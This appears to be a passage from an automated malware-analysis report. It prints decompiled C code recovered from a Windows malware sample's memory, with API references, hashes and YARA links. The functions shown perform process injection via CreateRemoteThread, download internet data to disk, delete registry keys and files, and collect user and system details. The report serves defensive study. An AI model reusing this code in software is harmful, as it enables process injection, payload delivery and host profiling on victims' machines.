				SHDeleteKeyW(0x80000001, _t52);
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				_t34 = 7;
				E0041596E(_t34,  &_v3072);
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				if(E00417158( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E00417EE1(__ebx, 0x474,  &_v1168);
				}
				if( *0x422e08 == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x0040f10a
0x0040f10a
0x0040f116
0x0040f11a
0x0040f121
0x0040f12f
0x0040f133
0x0040f13a
0x0040f142
0x0040f144
0x0040f14b
0x0040f14d
0x0040f152
0x0040f15e
0x0040f165
0x0040f16c
0x0040f173
0x0040f180
0x0040f19c
0x0040f1ab
0x0040f1af
0x0040f1b3
0x0040f1b4
0x0040f1bd
0x0040f1c5
0x0040f1ca
0x0040f1d2
0x0040f1ec
0x0040f1f1
0x0040f1f1
0x0040f1fd
0x0040f201
0x0040f201
0x0040f20e

APIs

Part of subcall function 00406AB8: PathRenameExtensionW.SHLWAPI(?,.dat,?,004229A0,00000032,77E49EB0,?,00000000), ref: 00406B33

PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 0040F12F
PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 0040F142

Part of subcall function 0040E698: SetEvent.KERNEL32(0040F152,00000000), ref: 0040E69E
Part of subcall function 0040E698: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040E6B1

Part of subcall function 00415B35: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,750D46D0), ref: 00415B72
Part of subcall function 00415B35: Sleep.KERNEL32(000001F4), ref: 00415B81
Part of subcall function 00415B35: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 00415B97

Part of subcall function 0041BA9D: FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BACE
Part of subcall function 0041BA9D: FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 0041BB29
Part of subcall function 0041BA9D: FindClose.KERNEL32(00000000,?,00000000), ref: 0041BB34
Part of subcall function 0041BA9D: SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000), ref: 0041BB40
Part of subcall function 0041BA9D: RemoveDirectoryW.KERNEL32(?,?,00000000), ref: 0041BB47

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0040F180
CharToOemW.USER32 ref: 0040F19C
CharToOemW.USER32 ref: 0040F1AB
ExitProcess.KERNEL32 ref: 0040F201

Part of subcall function 00417EE1: CharToOemW.USER32 ref: 00417F11
Part of subcall function 00417EE1: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00417F95

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
String ID:
API String ID: 1572960351-0
Opcode ID: 41388d71211dccdda4ff7d1a0613181a0220bafe2614ad0bd51cce0de9bdc306
Instruction ID: 3e635dc6a14fa669bf9bfac9dd0796a2dbf20fd77371aeec616487593a42b744
Opcode Fuzzy Hash: 41388d71211dccdda4ff7d1a0613181a0220bafe2614ad0bd51cce0de9bdc306
Instruction Fuzzy Hash: 6321AE72608344ABC230A7A5DD0AFDB779CEB80310F40092BB548E7191DB78A544CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 00418263, Relevance: 9.1, APIs: 6, Instructions: 74
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418263(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E004163F1(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) {
						E0041B785(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E00416421(_v20);
				goto L13;
			}

0x00418280
0x00418289
0x0041828e
0x0041832e
0x00418334
0x00418334
0x00418299
0x0041829e
0x004182a3
0x0041831a
0x0041831b
0x00418324
0x00418329
0x00418329
0x00000000
0x00418324
0x004182a5
0x004182a8
0x004182d5
0x00000000
0x00000000
0x004182da
0x00418308
0x0041830e
0x00000000
0x0041830e
0x004182f0
0x00000000
0x00000000
0x004182f2
0x004182f8
0x00000000
0x00000000
0x004182fa
0x00418303
0x00000000
0x00000000
0x00000000
0x00418305
0x00418315
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 00418283
WaitForSingleObject.KERNEL32(?,00000000), ref: 004182B1
InternetReadFile.WININET(00001000,?,00001000,?), ref: 004182CD
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004182E8
FlushFileBuffers.KERNEL32(00000000), ref: 00418308
CloseHandle.KERNEL32(00000000), ref: 0041831B

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 3509176705-0
Opcode ID: a4f1c7792630f007a6c0e96eff61012815f17df562e80fd9353712034334940c
Instruction ID: fb4cfb96fa32c20e05f8d64c6214aec846e094cfd2812eec0a871d786c359294
Opcode Fuzzy Hash: a4f1c7792630f007a6c0e96eff61012815f17df562e80fd9353712034334940c
Instruction Fuzzy Hash: C821CF7090010CBFDF119FA0DD84AEE7B7AEB04B00F04406EF920B21A1CB3A8D819B28

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB5D, Relevance: 9.1, APIs: 6, Instructions: 72
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041AB5D(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) {
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E0041AB5D(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

0x0041ab69
0x0041ab6c
0x0041ab71
0x0041ab75
0x0041ab7f
0x0041ab83
0x0041abb2
0x0041abb8
0x0041abbf
0x0041ac10
0x0041ac12
0x0041ac12
0x0041abc1
0x0041abca
0x0041abdf
0x0041abfa
0x0041ac0a
0x0041ac0a
0x0041abb4
0x0041abb4
0x0041abb4
0x0041abb2
0x0041ac1c

APIs

WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 0041AB79
SendMessageTimeoutW.USER32 ref: 0041ABAA
GetWindowLongW.USER32(00000000,000000F0), ref: 0041ABCE
SetWindowLongW.USER32 ref: 0041ABDF
GetWindowLongW.USER32(?,000000F0), ref: 0041ABFC
SetWindowLongW.USER32 ref: 0041AC0A

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: 859dc8df6dcc1ebd4573e9bee851ba46136a381d0727c62f45e34d34f983877f
Instruction ID: aab25c7855bb177517dc3cc880fc13d575527d44d9b35705a65d967a22779575
Opcode Fuzzy Hash: 859dc8df6dcc1ebd4573e9bee851ba46136a381d0727c62f45e34d34f983877f
Instruction Fuzzy Hash: 8321D871508315ABDB109F65CC44EAB7B98EB84730F20472AFDA0923E2D674D994CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00415FF2, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415FF2(intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				void* _t13;
				signed short _t26;
				void* _t37;

				_t37 = E00416F70(_a4);
				if(_t37 > 0x3e8) {
					EnterCriticalSection(0x423148);
					E00416421( *0x42313c);
					 *0x42313c =  *0x42313c & 0x00000000;
					 *0x423144 = 0;
					LeaveCriticalSection(0x423148);
					return 0;
				}
				EnterCriticalSection(0x423148);
				_t26 = ( *0x423144 & 0x0000ffff) + _t37;
				if(_t26 <= 0x3e8) {
					_t13 = E004163AC(_t26 + _t26, 0x42313c);
					if(_t13 != 0) {
						_t13 = E0041645D( *0x42313c + ( *0x423144 & 0x0000ffff) * 2, _a4, _t37 + _t37);
						 *0x423144 = _t26;
					}
				} else {
					_t13 = E004163AC(0x7d0, 0x42313c);
					if(_t13 != 0) {
						E0041645D( *0x42313c,  *0x42313c + (( *0x423144 & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + 0x3e8 - _t37);
						_t13 = E0041645D(0x3e8 - _t37 + 0x3e8 - _t37 +  *0x42313c, _v8, _t37 + _t37);
						 *0x423144 = 0x3e8;
					}
				}
				LeaveCriticalSection(0x423148);
				return _t13;
			}

0x00415ffe
0x00416007
0x0041600f
0x0041601b
0x00416020
0x0041602a
0x00416030
0x00000000
0x00416030
0x00416041
0x0041604e
0x00416057
0x004160a7
0x004160ae
0x004160c9
0x004160ce
0x004160ce
0x00416059
0x0041605e
0x00416065
0x00416082
0x00416096
0x0041609b
0x0041609b
0x00416065
0x004160da
0x00000000

APIs

EnterCriticalSection.KERNEL32(00423148,?,?,?,004162E5,?), ref: 0041600F

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

LeaveCriticalSection.KERNEL32(00423148,?,?,?,004162E5,?), ref: 00416030
EnterCriticalSection.KERNEL32(00423148,?,?,?,?,004162E5,?), ref: 00416041
LeaveCriticalSection.KERNEL32(00423148,?,?,?,004162E5,?), ref: 004160DA

Strings

H1B, xrefs: 00416009
<1B, xrefs: 00416050

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap
String ID: <1B$H1B
API String ID: 1946732658-283905126
Opcode ID: cfefa21e7802a5a13fad703274c0d355cbc20110554d19dd85c0375b5c0e81d2
Instruction ID: b6ca93bbdd33283d58afcc688506cf089c1f223f1f0dfa2792bfe77ec2bf0932
Opcode Fuzzy Hash: cfefa21e7802a5a13fad703274c0d355cbc20110554d19dd85c0375b5c0e81d2
Instruction Fuzzy Hash: 2621F231300214ABC720DF94ED859BA77B8AF8974AB41002BFA4087171DF3ECAA2C75D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B63F, Relevance: 9.1, APIs: 6, Instructions: 68
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0041B63F(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x0041b63f
0x0041b652
0x0041b664
0x0041b66a
0x0041b670
0x0041b6e0
0x0041b6e0
0x0041b672
0x0041b677
0x0041b67f
0x0041b6d7
0x0041b6da
0x00000000
0x0041b686
0x0041b686
0x0041b689
0x0041b68e
0x0041b69f
0x0041b6a5
0x0041b6a9
0x00000000
0x0041b6ab
0x0041b6bf
0x0041b6d1
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b6bf
0x0041b690
0x0041b690
0x0041b692
0x0041b692
0x0041b692
0x0041b68e
0x0041b67f
0x0041b6e4

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B664
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B677
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B69F
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B6B7
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B6D1
CloseHandle.KERNEL32(?,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B6DA

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: c2e9f9758a66021854d5a0592999c77f6b9aaf385cead8ab400b9077d8b8dfea
Instruction ID: 214f60e33de68eca55045b319765b15f9c67a0f5fc5d9b241046465a5d5136f1
Opcode Fuzzy Hash: c2e9f9758a66021854d5a0592999c77f6b9aaf385cead8ab400b9077d8b8dfea
Instruction Fuzzy Hash: 7C119071200200BFDB218F61CD49EBB7BECEB54700B10492EF586E61A0E735A980CB29

Uniqueness

Uniqueness Score: -1.00%

Function 004092FB, Relevance: 9.1, APIs: 6, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004092FB(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x422940 & 0x00000004) == 0 || E004068C0() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x422e14);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

0x00409306
0x0040930a
0x0040937c
0x00000000
0x00409315
0x00409321
0x00409325
0x00000000
0x0040932c
0x0040933b
0x00409345
0x0040934b
0x0040935b
0x00409363
0x0040936a
0x0040936d
0x00409373
0x00409376
0x00409379
0x00000000
0x00409379
0x00409325

APIs

GetUpdateRgn.USER32 ref: 00409383

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

TlsGetValue.KERNEL32 ref: 0040931B
SetRectRgn.GDI32(?,?,?,?,?), ref: 0040933B
SaveDC.GDI32(?), ref: 0040934B
SendMessageW.USER32(?,00000014,?,00000000), ref: 0040935B
RestoreDC.GDI32(?,00000000), ref: 0040936D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: f34a37116e45c514fbda48e611fcff6800e8d0e55dc362117a8d25819de3b1e6
Instruction ID: d6fa26c7c848dfcd021c0d53a8b22b7b3f5e57c32709c2bd51f0694b49955477
Opcode Fuzzy Hash: f34a37116e45c514fbda48e611fcff6800e8d0e55dc362117a8d25819de3b1e6
Instruction Fuzzy Hash: 0B115E32000741EBCB325F60ED48F97BBA5EB08711F004A29FA96A16B2C3759850DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB12, Relevance: 9.1, APIs: 6, Instructions: 54
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041CB12(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E004067D5(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x422954 + E00406F7B, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

0x0041cb12
0x0041cb15
0x0041cb23
0x0041cb2c
0x0041cb2e
0x0041cb30
0x0041cb32
0x0041cb37
0x0041cb3c
0x0041cb40
0x0041cb54
0x0041cb5a
0x0041cb5f
0x0041cb84
0x0041cb61
0x0041cb67
0x0041cb70
0x0041cb76
0x0041cb76
0x0041cb5f
0x0041cb8b
0x0041cb91
0x0041cb98

APIs

OpenProcess.KERNEL32(0000047A,00000000,74B5F560,00000000,74B5F560,?,?,0041CCD4,?,?,00000000), ref: 0041CB26
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-008298CF,00000000,00000000,00000000), ref: 0041CB54
WaitForSingleObject.KERNEL32(00000000,00002710,?,0041CCD4,?,?,00000000), ref: 0041CB67
CloseHandle.KERNEL32(74B5F560,?,0041CCD4,?,?,00000000), ref: 0041CB70
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,0041CCD4,?,?,00000000), ref: 0041CB84
CloseHandle.KERNEL32(00000000,?,00000000,?,?,0041CCD4,?,?,00000000), ref: 0041CB8B

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: 23cf972acba29a92566a51045638cc5e2432999681839c50ad8adfebcf9d60ec
Instruction ID: d9d8660a0b7752b732fc63819e24d66d8c00562a315f4a793faf74c25ff5c16b
Opcode Fuzzy Hash: 23cf972acba29a92566a51045638cc5e2432999681839c50ad8adfebcf9d60ec
Instruction Fuzzy Hash: 830192B21441487FE7002F64ADC9DBF3F6CDB493A4B004169F606F6160C6795C858679

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00404DC9(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t114 =  *_t111;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E0041BD10(_t114);
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if(__eflags == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x1050809;
						_t99 = E0041BD24(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E00416421( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E00404D15(_t106, _t111, 2);
									E00404D15(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 != 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E0041BDD1(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_t64 =  &_v588;
								__imp__GetUserNameExW(2, _t64,  &_a4);
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E0041BDD1(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E0040745C(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E0041BD24(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E0041BD24(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00416523();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E0041BD24(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E0041654B();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E0041BD24(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t104 = 4;
					_t99 = E0041BD24(_t111, _t104);
					goto L16;
				}
				_t92 = E00406A66(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E0041BDD1(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E00406BC4( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E0041BDD1(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}

0x00404dc9
0x00404dc9
0x00404dd4
0x00404dd7
0x00404ddb
0x00404ddd
0x00404de1
0x00404de3
0x00404de8
0x00404dec
0x00000000
0x00404dee
0x00404df5
0x00404df5
0x00404df9
0x00404e02
0x00404e4b
0x00404e4b
0x00404e4f
0x00404e54
0x00404e55
0x00404e56
0x00404e5d
0x00404e60
0x00404e6c
0x00404e6c
0x00404e6e
0x00404e6e
0x00404e72
0x00404ee7
0x00404ee7
0x00404ee9
0x00404fec
0x00404fec
0x00404ff0
0x00404ff4
0x00404ff9
0x00404ff9
0x00404ff9
0x00404ffc
0x00000000
0x00404ffc
0x00404eef
0x00404ef3
0x00404f41
0x00404f41
0x00404f43
0x00000000
0x00000000
0x00404f49
0x00404f4d
0x00404fcd
0x00404fcd
0x00404fcf
0x00000000
0x00000000
0x00404fd1
0x00404fd5
0x00404fda
0x00404fe2
0x00404fe2
0x00000000
0x00404fd5
0x00404f5d
0x00404f63
0x00404f66
0x00404f68
0x00404f6a
0x00404f71
0x00404f7a
0x00404f85
0x00404f85
0x00404f87
0x00404f8e
0x00404f90
0x00000000
0x00404f92
0x00404f96
0x00404f9f
0x00404fa5
0x00404fa7
0x00404fa9
0x00404fac
0x00404fae
0x00404fb0
0x00404fb7
0x00404fc0
0x00404fcb
0x00404fcb
0x00404fae
0x00000000
0x00404fa7
0x00404f90
0x00404ef5
0x00404ef8
0x00404eff
0x00404f03
0x00404f04
0x00404f0b
0x00404f0c
0x00404f11
0x00404f13
0x00404f15
0x00404fe9
0x00000000
0x00404fe9
0x00404f1b
0x00404f24
0x00404f2a
0x00404f2e
0x00404f2f
0x00404f36
0x00404f37
0x00404f3c
0x00404f3f
0x00000000
0x00404f3f
0x00404e74
0x00404e76
0x00000000
0x00000000
0x00404e81
0x00404e87
0x00404e88
0x00404e89
0x00404e90
0x00404e98
0x00404e9a
0x00404e9c
0x00000000
0x00000000
0x00404ea7
0x00404ead
0x00404eae
0x00404eaf
0x00404eb6
0x00404ebe
0x00404ec0
0x00404ec2
0x00000000
0x00000000
0x00404ece
0x00404ed4
0x00404ed5
0x00404ed6
0x00404edd
0x00404ee5
0x00000000
0x00404ee5
0x00404e0b
0x00404e16
0x00404e21
0x00404e23
0x00404e25
0x00000000
0x00000000
0x00404e2b
0x00404e30
0x00404e35
0x00404e3d
0x00404e45
0x00404e45
0x00404e47
0x00404e49
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00404EC8
GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?), ref: 00404F1B
GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 00404F5D
